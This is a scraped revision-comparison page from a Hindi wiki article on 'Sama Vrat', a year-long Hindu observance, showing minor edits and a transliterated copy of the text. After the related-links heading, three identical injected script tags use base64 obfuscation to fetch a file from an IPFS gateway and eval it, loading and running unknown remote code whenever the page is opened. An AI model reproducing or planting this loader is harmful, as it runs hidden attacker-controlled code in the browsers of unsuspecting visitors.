Difference between revisions of "साम व्रत"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('*भारत में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा ...' के साथ नया पन्ना बनाया)
 
m (Text replace - "==टीका टिप्पणी और संदर्भ==" to "{{संदर्भ ग्रंथ}} ==टीका टिप्पणी और संदर्भ==")
 
(3 intermediate revisions by 3 users not shown)
Line 1: Line 1:
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
+
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
 
*यह संवत्सरव्रत है।
 
*यह संवत्सरव्रत है।
 
*एक वर्ष तक गोबर से बने वृत्त में [[शिव]] एवं [[कृष्ण]] की प्रतिमा को स्नान कराना।
 
*एक वर्ष तक गोबर से बने वृत्त में [[शिव]] एवं [[कृष्ण]] की प्रतिमा को स्नान कराना।
 
*अन्त में किसी सामवेदी ब्राह्मण को तिलधेनु के साथ एक स्वर्णघट का दान देना।<ref>कृत्यकल्पतरु (व्रतखण्ड 442-443, [[मत्स्य पुराण]] 101|25-26 से उद्धरण); हेमाद्रि (व्रतखण्ड 2, 864, [[पद्म पुराण]] के श्लोक)।</ref>
 
*अन्त में किसी सामवेदी ब्राह्मण को तिलधेनु के साथ एक स्वर्णघट का दान देना।<ref>कृत्यकल्पतरु (व्रतखण्ड 442-443, [[मत्स्य पुराण]] 101|25-26 से उद्धरण); हेमाद्रि (व्रतखण्ड 2, 864, [[पद्म पुराण]] के श्लोक)।</ref>
  
{{लेख प्रगति
+
{{संदर्भ ग्रंथ}}
|आधार=आधार1
 
|प्रारम्भिक=
 
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>

Latest revision as of 10:12, 21 March 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • yah sanvatsaravrat hai.
  • ek varsh tak gobar se bane vritt mean shiv evan krishna ki pratima ko snan karana.
  • ant mean kisi samavedi brahman ko tiladhenu ke sath ek svarnaghat ka dan dena.[1]


tika tippani aur sandarbh

  1. krityakalpataru (vratakhand 442-443, matsy puran 101|25-26 se uddharan); hemadri (vratakhand 2, 864, padm puran ke shlok).

any sanbandhit liank

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>